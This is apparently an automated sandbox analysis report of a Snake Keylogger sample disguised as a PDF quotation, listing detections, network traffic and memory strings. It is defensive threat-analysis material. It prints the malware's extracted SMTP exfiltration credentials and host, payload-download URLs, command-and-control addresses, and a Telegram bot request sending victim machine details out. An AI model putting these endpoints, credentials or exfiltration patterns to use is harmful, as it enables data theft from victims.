Windows Analysis Report
QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

AV Detection

Source: http://anotherarmy.dns.army:8081

Avira URL Cloud: Label: malware

Source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sendoka@grupomss.com", "Password": "KART&&UK55@@!!", "Host": "investms.vadavo.cloud", "Port": "587"}

Source: http://varders.kozow.com:8081	Virustotal: Detection: 14%			Perma Link
Source: http://aborters.duckdns.org:8081	Virustotal: Detection: 11%			Perma Link
Source: http://anotherarmy.dns.army:8081	Virustotal: Detection: 14%			Perma Link

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Virustotal: Detection: 21%

Perma Link

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Source: unknown

DNS query: name: reallyfreegeoip.org

Compliance

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49757 version: TLS 1.2

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2347202995.0000013750D40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2347202995.0000013750D40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 4x nop then jmp 00007FFD9B980636h		0_2_00007FFD9B970472
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 00007FFD9B88C7D5h		10_2_00007FFD9B88C3ED
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 00007FFD9B88C1BBh		10_2_00007FFD9B88BF8F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 00007FFD9B889B80h		10_2_00007FFD9B889B56
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 00007FFD9B8889CDh		10_2_00007FFD9B8887E1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 00007FFD9B88C7D5h		10_2_00007FFD9B88C6F1

Networking

Source: unknown

DNS query: name: api.telegram.org

Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49758 -> 185.123.204.162:587

Source: global traffic	HTTP traffic detected: GET /data-package/v4mecse6/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /storage/download/iiz1WoiTc5zb HTTP/1.1Host: s22.filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2028/07/2024%20/%2001:17:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /data-package/v4mecse6/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: UTMEMUS UTMEMUS
Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: VADAVOES VADAVOES
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic

TCP traffic: 192.168.2.4:49758 -> 185.123.204.162:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /data-package/v4mecse6/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /storage/download/iiz1WoiTc5zb HTTP/1.1Host: s22.filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2028/07/2024%20/%2001:17:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /data-package/v4mecse6/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: filetransfer.io
Source: global traffic	DNS traffic detected: DNS query: s22.filetransfer.io
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: investms.vadavo.cloud

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 27 Jul 2024 09:02:30 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E221F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filetransfer.io
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filetransfer.io/data-package/v4mecse6/download
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E221F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E22C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://investms.vadavo.cloud
Source: MSBuild.exe, 0000000A.00000002.2906657414.00000250E0478000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E22C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2920294754.00000250FA8F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.i.lencr.org/0
Source: MSBuild.exe, 0000000A.00000002.2906657414.00000250E0478000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E22C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2920294754.00000250FA8F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.org0#
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737B71000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: MSBuild.exe, 0000000A.00000002.2906657414.00000250E0478000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E22C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2920294754.00000250FA8F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: MSBuild.exe, 0000000A.00000002.2906657414.00000250E0478000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E22C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2920294754.00000250FA8F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E21F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E21F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E21F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E21F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20a
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E22FC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E221F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E2331000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E22F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en8
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737BCE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filetransfer.io
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737BCE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737C7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filetransfer.io/data-package/v4mecse6/download
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E2150000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E21C6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E21F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E2150000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E217E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s22.filetransfer.io
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737BFE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s22.filetransfer.io/storage/download/iiz1WoiTc5zb
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737C7F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
